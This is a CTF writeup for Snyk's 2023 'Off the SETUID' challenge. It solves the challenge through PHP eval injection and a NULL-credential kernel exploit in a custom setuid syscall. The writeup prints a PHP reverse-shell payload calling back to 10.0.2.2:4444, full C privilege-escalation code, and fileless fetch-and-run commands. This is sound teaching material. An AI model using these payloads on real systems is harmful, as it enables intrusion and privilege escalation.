Snyk Fetch the Flag CTF 2023 writeup: Off the SETUID

Written by:

Carlos Polop

Yago Gutiérrez

November 30, 2023

Thanks for playing Fetch with us! Congrats to the thousands of players who joined us for Fetch the Flag CTF. If you were at Snyk’s 2023 Fetch the Flag and are looking for the answer to the Off the SETUID challenge, you’ve come to the right place. Let’s walk through the solution together!

You find yourself in an unfamiliar environment. Can you live off the land? Or, can you just live...

Retrieve the flag out of the root user's home directory.

This is a weird one. Is it a web challenge or a kernel pwn one?

We have a qemu script, a compiled kernel (with its respective .diff), and an initramfs image (along with the code for the init program). For starters, we can just decompress the initramfs and take a look inside.

To distro or not to distro

$ zstdcat -d - < ../initramfs.img | cpio -i
172272 blocks
$ ls -l
total 48
lrwxrwxrwx 1 arget arget     8 oct 30 22:00 bin -> usr/bin/
drwxr-xr-x 2 arget arget  4096 oct 30 22:00 dev
drwxr-xr-x 2 arget arget  4096 oct 30 22:00 etc
drwxr-xr-x 2 arget arget  4096 oct 30 22:00 home
-rwxr-xr-x 1 arget arget 16264 oct 30 22:00 init
lrwxrwxrwx 1 arget arget     8 oct 30 22:00 lib64 -> /usr/lib
drwxr-xr-x 2 arget arget  4096 oct 30 22:00 proc
drwx------ 2 arget arget  4096 oct 30 22:00 root
drwxr-xr-x 2 arget arget  4096 oct 30 22:00 sys
drwxr-xr-x 4 arget arget  4096 oct 30 22:00 usr
drwxr-xr-x 3 arget arget  4096 oct 30 22:00 var
$ ls usr/bin/
php
$ ls -l root/flag.txt 
-r-------- 1 arget arget 25 oct 30 22:00 root/flag.txt

Alright, distro-less. No shell, no common utilities, no nothing. The init program is obviously compiled (there's no shell so it can't be a script), but we have its source code too:

// [Definition of add_dev_addr() and default_gw()]
int main()
{
	mknod("/dev/null" , 0666 | S_IFCHR, makedev(1, 3));
	mknod("/dev/ttyS0", 0660 | S_IFCHR, makedev(4, 64));

	mount("proc", "/proc", "proc" , MS_NOEXEC | MS_NODEV | MS_NOSUID, NULL);
	mount("sysfs", "/sys", "sysfs", MS_NOEXEC | MS_NODEV | MS_NOSUID, NULL);
	mount(NULL, "/", NULL, MS_REMOUNT | MS_RDONLY, NULL);

	int fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_IP);
	add_dev_addr(fd, "10.0.2.15", "255.255.255.0");
	default_gw(fd, inet_addr("10.0.2.2"));
	close(fd);

	if (!fork())
	{
		setresuid(100, 100, 100);
		chdir("/var/run");
		execl("/usr/bin/php", "php", "-S", "0:8080", NULL);
		err(1, "Something failed");
	}
	wait(NULL);

	reboot(RB_POWER_OFF);
}

It does the typical things an init program does: it creates some device nodes, mounts procfs and sysfs (with noexec, nodev and nosuid), remounts the rootfs read-only and configures the network. It then starts PHP's built-in HTTP server on port 8080, serving /var/run, as the user with uid=100. When that server exits, init powers the machine off.

In /var/run, there's just an index.php:

// [CSS stuff]
<h2>Super Secure PHP Code Evaluator</h2>
<div class="container">
    <form method="post">
        <input type="text" name="code" placeholder="Enter code" required>
        <br>
        <button type="submit">Eval Code</button>
    </form>
    <?php
    if ($_SERVER['REQUEST_METHOD'] == 'POST') {
        $code = $_POST['code'];
        eval($code);
    }
    ?>
</div>
<br><br><br>
<a href="?debug">Show Source Code</a>

<?php
if (isset($_GET['debug'])) {
    highlight_file(__FILE__);
}
?>

To recap, the HTTP server passes the code POST parameter straight to eval(), so it is trivially vulnerable to PHP code injection. We can inject something like the following to get an interactive reverse PHP shell (here connecting back to a listener on 10.0.2.2:4444):

$s = fsockopen("10.0.2.2", 4444);
proc_open(['php', '-a'], array(0 => $s, 1 => $s, 2 => $s), $p);

But we can't read the flag since it is only readable by root. Therefore, we need to find a way to escalate privileges. Enter fun_setuid.diff.

fun_setuid()

In the .diff file we can see that a new syscall was added to the kernel:

struct cred* prepare_user_creds(kuid_t kuid)
{
	struct cred* new;
	long retval;
	if (!uid_valid(kuid))
		return NULL;

	new = prepare_creds();
	if (!new)
		return (struct cred*) -ENOMEM;

	new->uid   = kuid;
	retval = set_user(new);
	if (retval < 0)
		goto error;
	new->euid  = kuid;
	new->suid  = kuid;
	new->fsuid = kuid;

	retval = security_task_fix_setuid(new, current_cred(), LSM_SETID_RES);
	if (retval < 0)
		goto error;

	retval = set_cred_ucounts(new);
	if (retval < 0)
		goto error;

	flag_nproc_exceeded(new);
	return new;

error:
	abort_creds(new);
	return (struct cred*) retval;
}

long __sys_fun_setuid(uid_t uid)
{
	const struct cred* old;
	struct cred* new;
	kuid_t kuid = make_kuid(current_user_ns(), uid);

	old = current_cred();

	if (uid_lt(kuid, old->uid) &&
	    !ns_capable_setid(old->user_ns, CAP_SETUID))
		return -EPERM;

	new = prepare_user_creds(kuid);
	if (new < 0)
		return (long) new;

	return commit_creds(new);
}

SYSCALL_DEFINE1(fun_setuid, uid_t, uid)
{
	return __sys_fun_setuid(uid);
}

In short, this syscall lets a process change its uid to any uid that is not lower than its current one (moving to a lower uid requires the CAP_SETUID capability).
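The permission check can be modelled in userspace to see which requests get through. This is only a sketch: model_uid_t and fun_setuid_allowed() are hypothetical names, and it assumes uids compare as plain 32-bit unsigned values, which is how uid_lt() behaves.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical userspace stand-in for a uid; not a kernel type. */
typedef uint32_t model_uid_t;

/* Models the check at the top of __sys_fun_setuid().
 * Returns true when the request would pass, false for -EPERM. */
bool fun_setuid_allowed(model_uid_t current_uid, model_uid_t requested,
			bool has_cap_setuid)
{
	/* Mirrors: if (uid_lt(kuid, old->uid) && !ns_capable_setid(...)) */
	if (requested < current_uid && !has_cap_setuid)
		return false;
	return true;
}
```

Note that fun_setuid_allowed(100, (model_uid_t)-1, false) is true: as an unsigned value, -1 is the largest possible uid, so the invalid uid passes this check and reaches prepare_user_creds().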

The syscall uses a helper function called prepare_user_creds(), which in turn uses prepare_creds() to allocate a new struct cred, edits it to describe the new user, and returns it. If an error occurs, it returns the negated error code cast to a pointer, which is why the syscall function checks that the returned value isn't negative before committing the credentials (see Design note below). It also checks that the requested uid is valid (i.e. not equal to -1); if it is invalid, it returns NULL.

Design note

There are also two serious problems with the new < 0 check:

Comparing a pointer against zero with < doesn't work in C. It just doesn't. Addresses are treated like an unsigned type, so asking whether one is negative makes no sense, and the compiler removes the if entirely.
Even if the compiler didn't remove it, the code still wouldn't work: in Linux on x86, kernel addresses are always negative when read as signed integers. So even when prepare_user_creds() finds no problem, the struct cred* pointer it returns would be interpreted as negative and would never be committed.
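For comparison, the kernel's usual idiom for returning an error code inside a pointer is ERR_PTR() / IS_ERR() from linux/err.h, which treats only the last 4095 values of the address space as errors. Below is a userspace model of that idiom, with hypothetical model_* names, showing one way the result could have been validated. It is a sketch, not the challenge authors' code.

```c
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define MODEL_MAX_ERRNO 4095UL	/* same bound as the kernel's MAX_ERRNO */

/* Encode a negative errno value as a pointer, like ERR_PTR(). */
void *model_err_ptr(long err)
{
	return (void *)(intptr_t)err;
}

/* True only for pointers that encode an errno value, like IS_ERR(). */
bool model_is_err(const void *p)
{
	return (uintptr_t)p >= (uintptr_t)-MODEL_MAX_ERRNO;
}

/* A result is safe to commit only if it is neither NULL nor an error. */
bool model_creds_usable(const void *p)
{
	return p != NULL && !model_is_err(p);
}
```

With a check like model_creds_usable(), both the -ENOMEM case and the NULL case would be rejected before anything is committed.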

Credentialism

The real problem is that the syscall function never checks for the NULL that prepare_user_creds() returns for an invalid uid, so it may commit a NULL pointer as the pointer to our credentials structure. After modifying the initramfs to add a busybox, we can execute sysctl vm.mmap_min_addr to see the minimum address a process can map on this system. If we were in need of further debugging, we have /proc/config.gz available too.

We can see that mmap_min_addr=0, and the run.sh script shows that the VM doesn't have SMAP enabled, so the kernel can read memory mapped by userspace... great! We can map the NULL address, place a credentials structure for root there and call fun_setuid(-1) to make our creds pointer point to NULL, i.e. to our fake credentials.
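The value that sysctl prints is also exposed as a file, /proc/sys/vm/mmap_min_addr, so it can be read without busybox. A minimal sketch of such a helper follows; read_sysctl_long() is a hypothetical name, not part of the original exploit.

```c
#include <stdio.h>

/* Reads one integer from a sysctl-style file such as
 * /proc/sys/vm/mmap_min_addr.
 * Returns -1 if the file cannot be opened or parsed. */
long read_sysctl_long(const char *path)
{
	FILE *f = fopen(path, "r");
	long value;

	if (!f)
		return -1;
	if (fscanf(f, "%ld", &value) != 1)
		value = -1;
	fclose(f);
	return value;
}
```

An exploit could call read_sysctl_long("/proc/sys/vm/mmap_min_addr") first and bail out early if the result is not 0, since the mmap() at address NULL would fail otherwise.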

#include <unistd.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <err.h>

#define __NR_fun_setuid 452
long fun_setuid(uid_t uid)
{
	return syscall(__NR_fun_setuid, uid);
}

struct cred
{
	int		usage;
	unsigned	uid;
	unsigned	gid;
	unsigned	suid;
	unsigned	sgid;
	unsigned	euid;
	unsigned	egid;
	unsigned	fsuid;
	unsigned	fsgid;
	unsigned	securebits;
	unsigned long	cap_inheritable;
	unsigned long	cap_permitted;
	unsigned long	cap_effective;
	unsigned long	cap_bset;
	unsigned long	cap_ambient;
	// ... pointers to stuff I don't care about
};

int main(int argc, char** argv)
{
	char buf[100];
	int fd;
	struct cred* cred = NULL;

	void* map = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
			MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0);
	if (map == MAP_FAILED)
		err(1, "mmap()");

	*cred = (struct cred) { 1, 0, 0, 0, 0, 0, 0, 0, -1, -1, -1, -1, -1 };

	printf("uid = %u\n", getuid());
	fun_setuid(-1);
	printf("uid = %u\n", getuid());

	fd = open("/root/flag.txt", O_RDONLY);
	write(0, buf, read(fd, buf, sizeof buf));
	close(fd);

	pause(); // If you don't look it isn't there :P
	return 0;
}

We don't really need to change the capabilities, but since we are here we can do it for extra points. But please note that it is very important to set cred->usage=1 (which is like a reference counter) or the kernel will think it is a UAF bug (BUG_ON(atomic_read(&new->usage) < 1)).

Also, we can't let this process end or the kernel will try to free this structure, and that wouldn't be healthy. That's why we can't spawn a shell (calling execve() ultimately does imply the demise of the current process), hence the pause() at the end.
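Since a miscounted positional initializer would silently put a value in the wrong field, the fake structure can also be filled with designated initializers. The sketch below is a variant, not the code used during the CTF: struct fake_cred and fill_fake_root_cred() are hypothetical names, it sets only what the text calls essential (usage=1 and every id set to 0), and it assumes the same field layout as the struct cred declared in the exploit above.

```c
/* Userspace copy of the start of the kernel's struct cred, with the same
 * fields as the exploit's declaration (assumed layout, x86-64). */
struct fake_cred {
	int		usage;
	unsigned	uid, gid, suid, sgid, euid, egid, fsuid, fsgid;
	unsigned	securebits;
	unsigned long	cap_inheritable, cap_permitted, cap_effective;
	unsigned long	cap_bset, cap_ambient;
};

/* Fills *c with minimal root credentials. */
void fill_fake_root_cred(struct fake_cred *c)
{
	*c = (struct fake_cred) {
		.usage = 1,	/* reference count; must be >= 1 */
		.uid = 0, .gid = 0,
		.suid = 0, .sgid = 0,
		.euid = 0, .egid = 0,
		.fsuid = 0, .fsgid = 0,
		/* securebits and capability sets are left at zero here */
	};
}
```

In the exploit this would be called as fill_fake_root_cred((struct fake_cred *) map) right after the mmap() succeeds.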

But we still have a problem: there is nowhere to upload the exploit so that it can be run, since the rootfs is read-only and the only other mounts are procfs and sysfs, both noexec. One option is to convert the exploit to shellcode and use PHP code to write it into the PHP process' own memory through its procfs mem file, achieving arbitrary native code execution. From there we could mmap() NULL, place the fake credentials and call fun_setuid(-1), none of which can be done from PHP scripting…
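The primitive behind that idea is that a process can write to its own address space through /proc/self/mem, and such writes are not stopped by page protections. The writeup would do this from PHP; the sketch below shows the same primitive in C, with poke_self() as a hypothetical helper name.

```c
#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <sys/types.h>
#include <unistd.h>

/* Writes len bytes from data to address addr of the calling process
 * through /proc/self/mem. Returns 0 on success, -1 on failure. */
int poke_self(void *addr, const void *data, size_t len)
{
	int fd = open("/proc/self/mem", O_WRONLY);
	ssize_t n;

	if (fd < 0)
		return -1;
	/* The file offset is the virtual address to write to. */
	n = pwrite(fd, data, len, (off_t)(uintptr_t)addr);
	close(fd);
	return n == (ssize_t)len ? 0 : -1;
}
```

Pointing addr at code the process is about to execute, and data at shellcode, turns this file write into native code execution.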

But that just isn't cool enough.

Memexec

A few months ago, we gave a talk at DEFCON 31 about circumventing, under certain circumstances, distro-less environments. For this, I (Yago Gutiérrez) developed a tool called memexec which allows you to run any program you'd like filelessly on PHP.

Just paste it into the interactive PHP session. From then on, you'll have a memexec() function which accepts two arguments: a URI to a binary and an array of arguments for the program. We can, for example, set up an HTTP server serving a busybox binary and execute commands inside the system:

php > memexec("http://10.0.2.2:8888/busybox", ["ls", "-la", "/"]);
memexec("http://10.0.2.2:8888/busybox", ["ls", "-la", "/"]);
total 16
drwxr-xr-x   10 root     root           260 Oct 24 22:42 .
drwxr-xr-x   10 root     root           260 Oct 24 22:42 ..
lrwxrwxrwx    1 root     root             8 Oct 24 22:31 bin -> usr/bin/
drwxr-xr-x    2 root     root           100 Oct 31 10:39 dev
drwxr-xr-x    2 root     root           120 Oct 24 22:53 etc
drwxr-xr-x    2 root     root            40 Oct 24 18:25 home
-rwxr-xr-x    1 root     root         16264 Oct 24 22:42 init
lrwxrwxrwx    1 root     root             8 Oct 24 18:25 lib64 -> /usr/lib
dr-xr-xr-x  102 root     root             0 Oct 31 10:39 proc
drwx------    2 root     root            60 Oct 24 18:25 root
dr-xr-xr-x   12 root     root             0 Oct 31 10:39 sys
drwxr-xr-x    4 root     root            80 Oct 24 18:25 usr
drwxr-xr-x    3 root     root            60 Oct 24 18:25 var
php > memexec("http://10.0.2.2:8888/busybox", ["mount"]);
memexec("http://10.0.2.2:8888/busybox", ["mount"]);
rootfs on / type rootfs (ro,size=94428k,nr_inodes=23607)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
php >

Important: There are no SSL libraries inside the VM, so be sure to use plain HTTP, not HTTPS.

Alllllright let's exploit this kernel once and for all.

php > memexec("http://10.0.2.2:8888/x", []);
memexec("http://10.0.2.2:8888/x", []);
the flag will be here...

Thanks for making Fetch happen!

A huge thank you to all the teams in Fetch the Flag 2023! It was great seeing all of you there and you can always find us at @Arget (@arget13 on GH) and @carlospolop (@carlospolop on GH too).

Here are the writeups for the other 2023 challenges. Dig in!
